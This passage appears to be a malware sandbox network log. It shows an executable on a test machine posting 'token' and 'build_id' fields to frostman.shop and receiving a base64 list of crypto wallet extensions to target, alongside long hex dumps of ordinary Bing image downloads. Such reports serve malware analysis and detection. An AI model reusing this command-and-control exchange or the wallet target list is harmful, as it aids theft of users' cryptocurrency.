                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 17 fa 3e ef dd b0 df fc 0a 8d b7 77 fb 14 ed 72 f2 2b 8f 84 be 19 87 58 4b 1f ec 8b c9 63 57 6b b8 7f 74 90 06 c7 cd 23 70 b9 4f c6 bc 8b c1 29 a9 4b e0 eb 8f 1d 78 a3 c5 12 6b 6d 75 6f 1c 57 10 a6 e5 b6 d3 e1 4f f9 60 8b ed bb 2d fe f5 69 eb 1a ba 6a 7a 7c 5a 36 a6 f3 cf 65 67 2f 95 69 65 f7 63 85 8f 39 d9 d1 bd b3 45 7e 2b a3 56 ad 5a 53 a6 ee a3 c9 7f b2 f6 76 77 d7 6d 3f 1e a6 f4 e2 9c 62 93 d2 f7 37 3c 5d a7 7c 1c 6d 51 ad 7c 0f 3c 10 b5 9c b0 db 5c 25 8f 98 b0 43 0e e3 e6 26 ef ba c4 8e 45 72 1a 6d d7 82 ad fe 1d 5f 78 6e c6 04 bf bc d5 ae 3c cb 44 fb db e6 8e 67 28 d0 7f 71 76 75 42 69 6e 9e 2b 7d 62 d2 d7 4f 7f f4 59 fe 66 7f b2 f9 4b c2 fd d6 5f d2 bc fb 48 bd d1 ad 2f a1 fb 3e cb 0b 8b 54 93 fb 3a 18 64 f2 b6 62 4f e0 ff 00 3c d7 9e f3 7a b8 a9
                                                                                                                                                                                                                                                                                                Data Ascii: >wr+XKcWkt#pO)KxkmuoWO`-ijz|Z6eg/iec9E~+VZSvwm?b7<]|mQ|<\%C&Erm_xn<Dg(qvuBin+}bOYfK_H/>T:dbO<z
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 19 27 bd 8e d3 e1 f6 85 67 e2 bf 1a 4b 0f 99 04 ba 5d 8d f2 ac 57 69 f2 c1 32 8f f9 69 fe d6 6b ea e8 fc 79 e1 0f 0e 68 ef 6b 67 3f da a4 b3 85 7f 73 12 7c bf f7 d5 79 5d c6 97 a3 78 5b e2 32 f8 7e de 7f b1 e9 ad 62 bf 64 b7 96 35 58 b7 05 fb db bf be 7d 6a bf f6 c6 fb a7 b5 d1 ef 92 05 f9 a2 9a e2 db 6b 2f b8 ff 00 6a bc 98 71 37 f6 66 25 e1 a9 53 bd 34 97 34 ba ff 00 96 e7 1d 7a 95 1d 4e 77 f0 87 8d 3e 2c f8 8f c4 52 4d 6b ac 49 05 86 9b 2f cb 6e 90 a6 e5 da 3f bd bb 8c d4 7f 0e 7c 6b a9 de cf fd 83 6f a9 58 dd 6c f3 3e ce 89 f2 cb 36 17 e5 4d cf c2 93 5e 5b f1 22 d6 ef 50 f1 55 a7 87 7c 3d af 25 ba de 4d b9 d1 5f 74 5e 67 7f 99 be 99 1e 95 cb d9 24 7a 04 fa b6 b5 67 3d d4 5a 85 ac d0 ca ff 00 68 f9 7f 78 8d f2 b0 51 d8 fe b5 ac b1 54 f1 b2 8d 5a 8d bb
                                                                                                                                                                                                                                                                                                Data Ascii: 'gK]Wi2ikyhkg?s|y]x[2~bd5X}jk/jq7f%S44zNw>,RMkI/n?|koXl>6M^["PU|=%M_t^g$zg=ZhxQTZ
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:13 UTC16067INData Raw: f7 da 5e c9 3c 4f df e5 66 e5 b3 de a9 eb 97 96 da d6 b9 a4 dd 59 e9 b1 de 4f 14 5f f1 ef 70 ff 00 bb fc 71 fe d5 72 c2 a5 49 56 5c d1 bd 3d 6d aa 7d fa bf eb 41 f2 5b dd be ba 1d df 82 34 bb 6f 10 78 16 de fa fe c7 c3 2d 66 c5 16 1b 2b 8b 56 8a f9 d8 b6 31 f2 fc 8d 91 d0 b5 70 f7 56 da 7d 9f 8c 5b c2 93 7f 6a c5 6f 04 db 75 18 bc 85 59 d1 4b 72 98 3c 7e 06 ba 2b 8b cb 9b 89 f5 1f 0f df 41 0b 5c 5a c5 34 57 16 89 f2 c4 98 c3 2a 83 fe cb 74 35 db 7c 2d 8d bf e1 2d 87 4d f1 35 dd ad d4 76 7a 73 35 be a1 70 8a d7 90 a8 6e 23 dd d6 48 d7 fd ae 47 6a f1 15 49 e1 5d 49 4b ad da 8f 6e cd 77 b7 de fc f6 36 8c 34 51 b6 bd ff 00 43 ce e1 fe c3 d3 bc 46 8d a7 df 3a e9 eb 34 cb 2a 79 1e 42 ee db bb 0b fe ef 6a 9b c7 1e 2e bb f1 06 a3 71 0b 4e 8f a6 e8 d6 9f 6c 69 91
                                                                                                                                                                                                                                                                                                Data Ascii: ^<OfYO_pqrIV\=m}A[4ox-f+V1pV}[jouYKr<~+A\Z4W*t5|--M5vzs5pn#HGjI]IKnw64QCF:4*yBj.qNli
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:13 UTC16384INData Raw: 47 44 fe e7 f5 aa bf da 73 f8 8f c0 f7 7f 67 f9 6e 22 8b ee 3f de e7 d2 a6 87 55 9f fb 1e c6 ea 39 3f 7d 6b 36 d7 ff 00 ae 65 7f a5 72 52 a7 cb 56 cd d9 de df 91 cd 88 97 bb a6 c7 9d fc 6b d4 e1 b8 f1 57 87 35 fb 84 dd f2 2c 13 4a 9f 79 59 7e 5c fd 2b 5b 4d bc b6 8f 52 49 a1 b4 f9 60 dd bf 67 bb 63 9a f3 5f 89 97 eb 7b a7 f9 76 f2 7e ee 2b 89 19 13 fe 05 9a f4 8f 05 dc c1 35 ad dc 97 4f fb e4 d3 20 64 74 f7 6a fa 3a 94 25 4f 09 0d 35 57 5f 8e 9f 99 e7 c2 a2 9a 71 f9 9d 26 a5 24 ba 7e 9b 71 75 36 ff 00 b3 ad a3 37 c9 fd de b5 89 f0 9f 5f 5f 10 58 b4 97 1f f1 f9 67 e6 6c 7f bb be 33 f7 53 3e a3 b5 6f f8 9b 53 59 7e 14 6e ba 8d 16 6b f4 fb 32 7f bb da b8 1f 87 3a 16 a3 2e 9b 35 8d 8b c7 15 d6 f9 2e dd dd f6 aa 47 0d 79 98 4a 30 96 1e a7 3e f7 b2 f4 ea 2a 71
                                                                                                                                                                                                                                                                                                Data Ascii: GDsgn"?U9?}k6erRVkW5,JyY~\+[MRI`gc_{v~+5O dtj:%O5W_q&$~qu67__Xgl3S>oSY~nk2:.5.GyJ0>*q
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:13 UTC16384INData Raw: d6 cf 2e f6 6f 27 7a 90 a1 47 f0 ae ea ee 3c 0d 68 da a5 c6 99 1c de 64 53 5a a4 36 72 ef f6 85 6b 8d f1 96 8b 1d 9f 8a ae db cc 8e 5b 76 b8 87 ec 3f de dc 1b e6 cd 7a 5f 83 6d a7 5d 7e e1 a1 f9 bf d3 a4 fb 9f c7 88 ca ff 00 e8 55 f5 f9 93 a5 cd 4e 71 d3 9a cf ef b7 e8 ff 00 01 62 29 c6 51 d3 73 d9 fe 00 f8 6e d9 3e 21 ff 00 6d 2c 1f 2d ad 8a b2 3f fb 5f 70 57 a0 6a 97 b2 6a 3a 95 db 2c 9f 2e fd bf 95 60 7c 2d 2d a6 f8 3a 6b a9 3e f3 22 aa 7e 0b 4b a7 df c4 9a 3c d2 37 de 97 73 57 d8 61 64 a8 e1 d4 bb 9c bc dc 91 f3 3c 97 e2 46 99 6d aa 78 83 c4 9a d4 93 c8 cd 6f 68 d0 79 3f 4e 98 af 9f 75 0b 1d 55 fc 41 12 d8 ff 00 ab 5b 78 bc ed ff 00 2f ef 37 7a 7f 17 15 ef 91 de 5e 45 e2 0d 41 96 4d b6 f2 c3 23 24 df df 63 cf 35 e7 bf 0a 52 db c4 7f 11 b7 34 7f b9 5b
                                                                                                                                                                                                                                                                                                Data Ascii: .o'zG<hdSZ6rk[v?z_m]~UNqb)Qsn>!m,-?_pWjj:,.`|--:k>"~K<7sWad<Fmxohy?NuUA[x/7z^EAM#$c5R4[


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                12192.168.2.649742116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----K6PZCBASJEKFU3ECBA1N
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 332
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------K6PZCBASJEKFU3ECBA1NContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------K6PZCBASJEKFU3ECBA1NContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------K6PZCBASJEKFU3ECBA1NCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:13 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:13 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                13192.168.2.649743150.171.27.10443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:13 UTC346OUTGET /th?id=OADD2.10239381681309_1UONBZH0MSLU4XT86&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:14 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 585710
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: AFD3716E6EC04951B5486142879D9CAC Ref B: EWR311000104011 Ref C: 2024-12-20T06:31:14Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:13 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:14 UTC15528INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 04 04 04 04 05 09 06 05 05 05 05 0b 08 08 06 09 0d 0b 0d 0d 0d 0b 0c 0c 0e 10 14 11 0e 0f 13 0f 0c 0c 12 18 12 13 15 16 17 17 17 0e 11 19 1b 19 16 1a 14 16 17 16 ff db 00 43 01 04 04 04 05 05 05 0a 06 06 0a 16 0f 0c 0f 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 ff c0 00 11 08 07 80 04 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                                                                                                                                                                                Data Ascii: JFIFCC8"}!1AQa"q2
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:14 UTC16384INData Raw: 23 a2 03 8a 36 77 c5 28 20 0a 33 5e 2d cf b0 e5 43 70 3b 53 58 77 a7 b7 34 98 26 9d c4 e2 41 20 cf 02 91 51 aa c0 4c 9e 45 3f 66 3b 55 73 91 ec c8 10 11 da a5 42 71 d2 83 c7 5a 33 8a 4d dc ae 5b 0e 06 9d 9f 7a 8f 75 19 f7 a4 04 99 3e a2 82 d8 ef 51 19 31 d4 d3 0c a7 ad 16 15 cb 01 a8 32 0a ac d2 9a 03 13 4e c1 72 c7 98 0f 7a 42 f9 e9 50 83 91 46 71 4c 44 db c8 a0 9c d4 5b e9 37 13 d2 81 32 5c d3 19 c7 ad 37 0c 7a 93 4e f2 b3 d4 d3 d1 13 66 c8 cb 8a 46 39 a9 d6 11 e9 f5 a7 08 47 a5 3e 64 1e cd b2 af 38 e2 8d 84 f6 ab 9e 50 fe ed 2f 94 07 6a 5c e8 3d 91 4b ca 34 e1 16 2a d1 4f 6a 36 7a 1a 39 c5 ec ca e1 3d a8 29 53 ed a4 db 47 30 b9 0a e5 33 4d 68 aa d6 05 35 94 55 73 09 d3 29 b4 55 0c 91 1c f4 ab cc 3d 45 34 a0 ed 56 a6 cc a5 48 cf f2 cd 35 a2 39 ad 02 83
                                                                                                                                                                                                                                                                                                Data Ascii: #6w( 3^-Cp;SXw4&A QLE?f;UsBqZ3M[zu>Q12NrzBPFqLD[72\7zNfF9G>d8P/j\=K4*Oj6z9=)SG03Mh5Us)U=E4VH59
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:14 UTC16384INData Raw: 9a 5c c5 72 84 68 31 d2 9e 23 c5 0a 40 e2 94 b5 2e 66 3e 54 1e 5a f5 a5 f2 c0 f4 a6 f2 68 e4 51 cc c2 c8 76 c5 f4 a3 60 03 20 0f a5 26 5b de 95 49 ef c5 17 63 b2 1a 57 07 81 4d 71 8e d9 a9 ba d3 59 73 47 31 2e 25 76 eb 41 1c 72 2a 6f 2f 71 c8 a6 ba e3 b1 aa e6 46 7c 84 68 c5 6a 45 65 3d 69 b8 cf 6a 08 c1 c0 a2 e9 8d 5d 16 22 00 72 0d 58 57 e3 04 55 34 35 62 37 03 83 59 cb 73 a6 9c d1 61 36 1e 08 a0 ed ed 4d 4c 13 9c 54 a0 0a c9 9d 51 95 d0 8a 40 ef 52 70 46 41 a8 98 28 e4 53 0b 60 e0 54 f2 dc d3 da 59 13 34 60 af 06 a1 f2 9b 38 cd 01 c8 a4 92 52 39 a6 a3 24 0e a4 18 bb 30 79 34 1e 38 a6 19 78 ce 45 30 c8 0d 52 8b 25 d4 88 e7 62 78 a8 f6 e4 7d da 03 00 73 9a 6b 4c 47 41 5a 28 b3 27 38 f5 24 54 51 d4 1a 77 92 8f d0 d5 73 72 47 06 85 b9 c7 39 a7 cb 31 7b 5a
                                                                                                                                                                                                                                                                                                Data Ascii: \rh1#@.f>TZhQv` &[IcWMqYsG1.%vAr*o/qF|hjEe=ij]"rXWU45b7Ysa6MLTQ@RpFA(S`TY4`8R9$0y48xE0R%bx}skLGAZ('8$TQwsrG91{Z
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:14 UTC16384INData Raw: 86 37 71 fe 90 e7 62 e6 03 df f8 73 d3 bd 24 5a 66 ab 1d f3 d8 5a df c1 61 24 81 1f 7d bb ef 57 5f bb c7 5c 8e 07 3e 95 34 f7 7a a4 11 5d 43 e7 46 d2 42 a5 e1 73 86 60 e9 ed dc 72 6b 2d 8b f5 28 dc 5b 78 98 d9 5c 8b 6d 76 3b 58 61 0a 64 8f ca 0a 5f 27 a0 cf de c5 57 95 f5 78 f4 59 83 c9 e6 cf 0d c0 91 19 e3 fb e7 18 ed c7 7e 9d 2b a6 b1 d3 27 8b 46 37 3a 8e ab 6f 77 75 39 0f b9 d7 72 84 ee 81 46 36 9e 7a 1e f5 5f 5a 8a 18 e0 8e 2b 4b a8 e5 8e 36 0b 23 96 c6 c2 c3 80 ca 7a 1e 3a f4 a7 cc 3e 53 0e ce 4d 6e 7b f5 13 5e 47 6b 20 55 75 78 ad 57 e6 7f 4e 7f c9 ad 91 69 af c7 70 5e 7d 6a e9 e6 55 3f bb db e5 05 ef d0 76 35 2e 87 65 6d 25 ed ba cb 32 c6 88 0b ef 1f 36 38 fb be fd 0f 1d b8 ae 86 0b f8 12 e6 68 89 5b 86 87 6c 49 21 43 ba 65 7e a0 63 a6 39 e7 b5 4c
                                                                                                                                                                                                                                                                                                Data Ascii: 7qbs$ZfZa$}W_\>4z]CFBs`rk-([x\mv;Xad_'WxY~+'F7:owu9rF6z_Z+K6#z:>SMn{^Gk UuxWNip^}jU?v5.em%268h[lI!Ce~c9L
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:14 UTC16384INData Raw: 06 cf ff 00 5d 1b 71 53 ec f6 a3 6f b5 66 3b 90 60 fa 50 ab 9e d5 3e df 6a 5d 94 82 e5 63 1e 7b 53 5a 11 e9 56 b1 ed 46 06 de 45 3d 46 a5 62 8c 91 7b 54 2d 19 07 35 a4 c8 08 e9 50 bc 3e 94 d7 31 a4 66 67 91 41 00 d5 a7 88 e7 a5 46 63 3e 95 d3 14 ec 6a 99 0e d1 db 34 6d 1e b5 23 21 a6 ed e7 b5 6b 18 36 3b 8d da 7d 68 da 7d 4d 3c 29 a7 05 1d c5 5f b3 02 2c 11 d2 8c 31 a9 b6 8e c3 f3 a3 6f a5 52 4d 01 0e 08 ea 28 e0 54 bb 0f ad 21 5a 77 60 45 8e f4 60 8a 79 c0 6a 6b 11 4f 9d 8e c3 7b 51 4e 2d 9e d4 84 9c d1 cc c7 ca 25 39 4d 34 b7 a9 a3 77 a5 2e 60 e5 1e a4 8a 2a 3c 93 d4 d1 53 ed 03 d9 9f 10 be c3 77 33 9c ed 64 fd 7f a5 52 64 66 9b 08 70 a0 7c c4 f6 a7 65 8e e7 72 dd 7b 1a 8a d2 42 f3 61 df 61 cf 04 8e 2b f5 46 ee 7c 19 6c 04 36 f8 67 39 56 cf 4f f3 9a 48
                                                                                                                                                                                                                                                                                                Data Ascii: ]qSof;`P>j]c{SZVFE=Fb{T-5P>1fgAFc>j4m#!k6;}h}M<)_,1oRM(T!Zw`E`yjkO{QN-%9M4w.`*<Sw3dRdfp|er{Baa+F|l6g9VOH
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:14 UTC16384INData Raw: db cc b6 8a 6d 99 4e 64 57 23 90 c7 8d be a3 91 cd 5f f8 85 aa da de 59 4e f0 4f 0c 6a d7 44 43 14 56 c2 25 96 3f ef 00 3a 30 c7 d0 d6 4e 97 77 9d 3d dc 18 5a 49 80 55 1f 67 27 23 3d db b0 c8 1c 0a 04 3b 4f 2b 1c 43 ed 88 19 8b 10 ee ab 92 3f bb 8c 1e 0f b7 f3 ab 17 17 91 c4 96 f0 a8 66 91 7f d7 65 7a 7f 78 7b fd 69 d2 48 f2 e4 47 67 70 92 bc ab c0 87 62 92 00 2c a0 77 05 48 20 ff 00 8d 17 f7 5e 1d 96 d4 4b 6d 6d 22 48 58 05 cf de 49 01 ef ea 08 07 8e f5 9d 87 72 9c ed 14 33 00 14 18 d9 b2 77 4b f9 fe 1d 2a 71 1e 63 59 6d a7 32 2b b6 dc 86 c6 df 7f 7a a4 d1 5b c9 24 a6 49 4e 24 19 64 db f3 63 af 1e 83 de 9d 6f 12 6e 6f b3 4c cd e5 a1 ca 91 d7 27 03 ea 79 a2 c1 72 ca bc d0 45 e7 85 6d b1 b8 0a 14 ed cb 1f 6e c7 03 a7 a5 6c d8 d8 5b 4c b1 ce e1 65 86 f8 37
                                                                                                                                                                                                                                                                                                Data Ascii: mNdW#_YNOjDCV%?:0Nw=ZIUg'#=;O+C?fezx{iHGgpb,wH ^Kmm"HXIr3wK*qcYm2+z[$IN$dconoL'yrEmnl[Le7
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:14 UTC16384INData Raw: eb c5 61 eb 3e 4e 9f 23 da 87 b8 10 b0 dd 66 25 8c 67 af 3b 8f 7e fc fb 8a d2 fb 54 3f d9 13 35 ce 81 6b 21 5d bf e9 d1 2b 2c d1 31 38 43 fe d8 e2 b1 75 89 2e ef e3 f3 e5 49 e6 8b cd 22 06 91 be 54 c8 e4 0f 7f e9 49 03 2a c1 00 96 e3 7c a4 cd c7 38 fe 0f 7f 7c 54 b2 b2 44 57 6c 7e 63 30 c1 24 f0 07 af b0 fd 68 89 05 a5 a7 9c 65 42 a9 ff 00 2c 9b ef 1f 7c 7a 53 12 54 bd 25 0c ca 8a cb 9d d8 c2 8c 75 c9 1d a9 08 d6 f0 a6 a7 05 96 a5 1b df da 4b 70 ae cd be 68 db 0a 8a 57 19 c7 7e 9d 7b 57 4f f1 06 24 8f c1 f1 c1 05 a4 8f 24 04 cd 3b c8 ea 16 12 46 07 3f c4 c7 70 e3 da b2 3c 28 b6 28 b6 ba 74 ed 02 ad ba cf 96 c9 56 76 71 90 a4 f7 1c 8c 7d 6b b8 f1 46 a6 8f a6 de 5b 4b 19 fb 44 31 29 31 c7 6c 1f 1b 50 03 f3 e7 81 f7 bd 49 14 ec 08 e4 da c6 c7 54 d7 6d d7 fb
                                                                                                                                                                                                                                                                                                Data Ascii: a>N#f%g;~T?5k!]+,18Cu.I"TI*|8|TDWl~c0$heB,|zST%uKphW~{WO$$;F?p<((tVvq}kF[KD1)1lPITm
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:14 UTC16069INData Raw: 3e 43 94 f9 e3 56 19 e4 8e aa 73 d3 9c 1f 4a e7 24 28 9c 09 8f 27 72 63 a8 fa fa 8a f4 05 8d e0 d0 2d 6e 6f 20 8e 6b 78 d4 79 93 c4 bb a4 81 c9 c8 47 53 c3 1f 7f 7a 6d de 99 a2 f8 83 7c 56 16 09 1c 91 8d e2 43 18 5f bc 06 72 46 30 37 0e 3d 09 aa 8c ac 44 a3 76 70 28 22 56 0c d0 fc dd d9 b9 c7 ff 00 5a a6 bf 8a 27 46 94 24 8a 33 c1 03 6a 9f 61 e9 53 5b 40 96 c6 46 78 dd 9b 25 1c 48 bf 77 db ff 00 af 4d 17 79 46 89 b7 46 9d 17 3f 32 9f c3 b5 69 b9 25 0b 57 4f 31 62 df 81 ee 39 3f 87 73 56 ef d1 45 ae 09 11 b2 9f 94 11 d7 fc 0d 24 f1 db cb 69 f6 98 3e 69 22 38 38 fe a3 d6 a8 49 71 36 76 b6 e6 5c fc 84 9a 7b 92 d9 66 27 83 ec ea 93 7d f6 3b 99 c0 fd 07 b5 3e de e6 df 3b 44 40 30 18 38 e3 38 ac d9 43 b2 9c 9d bb 4e 4a 9e 95 2c 5e 5b 33 2a 09 37 2a e5 be 5e 9f
                                                                                                                                                                                                                                                                                                Data Ascii: >CVsJ$('rc-no kxyGSzm|VC_rF07=Dvp("VZ'F$3jaS[@Fx%HwMyFF?2i%WO1b9?sVE$i>i"88Iq6v\{f'};>;D@088CNJ,^[3*7*^
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:14 UTC16384INData Raw: 3d c9 0a ef 04 2a a2 15 e5 64 19 da 3d 07 a8 ef 50 19 a2 96 6c 5c 8f 29 b6 e5 04 6d 80 73 ed e9 42 b8 0f 8c 90 0c 11 64 44 ad f3 6d fe 3a 66 a0 44 40 45 10 6f b4 30 e1 15 be ef bf b8 aa b2 45 70 f7 2d f6 66 66 11 ae e6 cf dd 18 ef f5 e2 a6 79 9d 5d 6e dd 0f 9a d1 e2 37 23 83 fe 7d 29 95 cc 52 8e 5b 99 2d 76 95 63 36 71 b8 9e 99 fe 75 24 3a 77 9c 5a 36 1b 99 bf 8f 77 53 db 1e 94 bf da 2e cc 0c e1 82 ee c4 8b 19 da 1f e9 e8 7d ea 3b a9 89 0c 6c 15 97 68 19 19 e9 f8 f7 ab 16 84 d7 1a 6e a5 0d be e1 bd 0e ed aa 84 f0 7f 1e e2 88 e0 9d d2 48 44 91 c2 ac 03 0d c3 a1 f6 f7 c7 6a 75 e5 cd e0 92 3b 6b 89 4c 65 94 1d 80 e4 7d 40 1f cb b5 32 f1 4c 9b 7c c6 32 08 bf 78 19 3e 5c fe 7d ea 55 c9 b8 c9 a3 68 0b 02 fe 60 7e e4 f5 ff 00 0a 8a 70 91 28 89 a5 66 5c 11 91 db
                                                                                                                                                                                                                                                                                                Data Ascii: =*d=Pl\)msBdDm:fD@Eo0Ep-ffy]n7#})R[-vc6qu$:wZ6wS.};lhnHDju;kLe}@2L|2x>\}Uh`~p(f\
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:14 UTC16384INData Raw: ec f5 4d 4a ea 19 a5 16 2a d6 90 9c 34 78 5e 71 e8 3a e4 7a 8a 8a ee fa c2 58 18 c8 43 29 39 00 a8 2c 99 ee 3d 7e 9d 2a ae de 86 77 57 09 b5 d9 64 4d b6 f7 4d e5 81 f7 4b 75 cf 5c fa d5 58 e7 17 36 d2 26 56 36 23 fd 70 63 ce 3e bf ca aa 8f ec f4 75 73 13 14 94 e1 42 8e 4f b8 ab 93 58 41 35 b3 cd 6f 70 41 53 c2 15 c8 3f 4f 7a ab 24 26 ee 36 3b b2 60 58 62 bb 08 aa 3a 15 eb fe 34 b6 4f 75 2d b4 8b 3d aa cb 86 dc 99 5e 98 eb f5 18 ac 4b 98 a5 b6 95 65 ba 46 5d ca 59 50 1e bf 5f 4a 9e cb 50 99 e6 59 51 99 76 1e 1c 2f 4f f0 15 4e 3d 84 5b b8 bf 95 24 02 02 02 a9 e7 e5 c7 ff 00 ac 54 e3 52 67 f2 c2 c0 0f 1c 8d c7 8f a7 a5 56 bf 80 4e 24 0f 1a ef db 94 75 f4 35 13 44 d6 ce c4 65 97 18 e4 fd e1 f8 74 fe 54 b4 11 ab 2d f0 81 7c d3 0c 72 36 06 f5 2b d3 a7 07 d4 54
                                                                                                                                                                                                                                                                                                Data Ascii: MJ*4x^q:zXC)9,=~*wWdMMKu\X6&V6#pc>usBOXA5opAS?Oz$&6;`Xb:4Ou-=^KeF]YP_JPYQv/ON=[$TRgVN$u5DetT-|r6+T


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                14192.168.2.649748116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
